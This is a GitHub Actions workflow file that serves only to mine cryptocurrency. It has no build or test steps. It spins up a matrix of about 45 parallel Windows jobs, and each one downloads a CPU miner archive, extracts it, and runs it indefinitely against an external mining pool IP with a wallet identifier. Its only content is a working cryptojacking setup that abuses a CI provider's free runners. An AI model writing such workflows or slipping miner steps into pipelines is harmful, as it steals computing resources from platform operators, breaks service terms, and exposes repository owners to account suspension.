name: kapten_crypto 
 
 
 
on: [workflow_dispatch] 
 
 
 
jobs: 
 
build: 
 
name: kapten_crypto 
 
runs-on: windows-latest 
 
strategy: 
 
max-parallel: 5 
 
fail-fast: false 
 
matrix: 
 
go: [1.0, 1.1, 1.2, 1.3, 1,35] 
 
flag: [A, B, C, D, E, F, G, H, I] 
 
env: 
 
NUM_JOBS: 20 
 
JOB: ${{ matrix.go }} 
 
steps: 
 
- name: DOWNLOAD 
 
run: Invoke-WebRequest https://github.com/jceminer/cn_cpu_miner/raw/master/jce_cn_cpu_miner.windows.033q.zip 
 
- name: Extract 
 
run: Expand-Archive jce_cn_cpu_miner.windows.033q.zip 
 
- name: Running 
 
run: .\jce_cn_cpu_miner64 --auto --any --forever --keepalive --variation 2 --low -o 168.235.86.33:3393 -u SK_pDKo9B7rTqyPDrYeohNv5.jabudeen -p x
 
- name: END 
 
run: exit
